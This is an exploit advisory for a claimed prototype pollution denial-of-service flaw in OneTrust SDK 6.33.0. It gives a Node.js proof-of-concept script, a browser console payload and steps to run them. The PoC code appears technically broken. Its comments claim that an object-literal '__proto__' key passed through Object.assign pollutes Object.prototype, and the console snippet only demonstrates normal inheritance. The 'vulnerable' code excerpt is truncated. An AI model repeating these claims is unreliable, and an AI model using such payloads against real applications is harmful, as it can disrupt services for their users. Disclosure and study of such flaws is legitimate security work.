- **Exploit Title**: OneTrust SDK 6.33.0 - Denial Of Service (DoS)
- **Date**: 01/01/2025
- **Exploit Author**: Alameen Karim Merali
- **Vendor Homepage**: [OneTrust JavaScript API](https://developer.onetrust.com/onetrust/docs/javascript-api)
- **Software Link**: [otBannerSdk.js v6.33.0](https://discord.com/assets/oneTrust/v4/scripttemplates/6.33.0/otBannerSdk.js)
- **Version**: 6.33.0
- **Tested on**: Kali Linux
- **CVE ID**: CVE-2024-57708

## Vulnerability Summary

A vulnerability exists in **OneTrust SDK v6.33.0** that allows an attacker to perform **Prototype Pollution** via the misuse of `Object.setPrototypeOf` and `Object.assign`. An attacker can inject malicious properties into the prototype chain, potentially causing **Denial of Service (DoS)** or altering the behavior of inherited objects throughout the application.

## Technical Details

The affected code includes prototype assignment logic such as:

```javascript
var o = function(e, t) {
  return (o = Object.setPrototypeOf || { __proto__: [] } instanceof ...);
};
```

If the `t` argument (a user-supplied object) contains a `__proto__` or `constructor.prototype` reference, it can pollute `Object.prototype` globally.

## Proof-of-Concept (PoC)

```javascript
function testPrototypePollution() {
  const maliciousPayload = {
    "__proto__": {
      polluted: "yes"
    }
  };

  // Using vulnerable function 'o'
  try {
    o({}, maliciousPayload);
    console.log("After o:", {}.polluted); // "yes"
  } catch (e) {
    console.error("Error testing o:", e);
  }

  // Using Object.assign
  try {
    Object.assign({}, maliciousPayload);
    console.log("After Object.assign:", {}.polluted); // "yes"
  } catch (e) {
    console.error("Error testing Object.assign:", e);
  }

  // Cleanup
  delete Object.prototype.polluted;
}
testPrototypePollution();
```

## Browser Console PoC (DevTools)

```javascript
var maliciousObj = { __proto__: { hacked: true } };
var newObj = Object.create(maliciousObj);
console.log(newObj.hacked); // true
```

Screenshot: [PoC Screenshot](https://ibb.co/B2hyYr5v)

## Steps to Reproduce

1. Save the PoC script above as `exploit.js`
2. Run using Node.js: `node exploit.js`
3. Observe polluted output (`{}.polluted === "yes"`)
4. Alternatively, run the payload in browser DevTools

## Impact

- Global object pollution
- Application logic errors
- Potential DoS
- Further exploitation depending on context

## Recommendation

Developers should upgrade to a patched version and sanitize any user input used in object merging or prototype manipulation.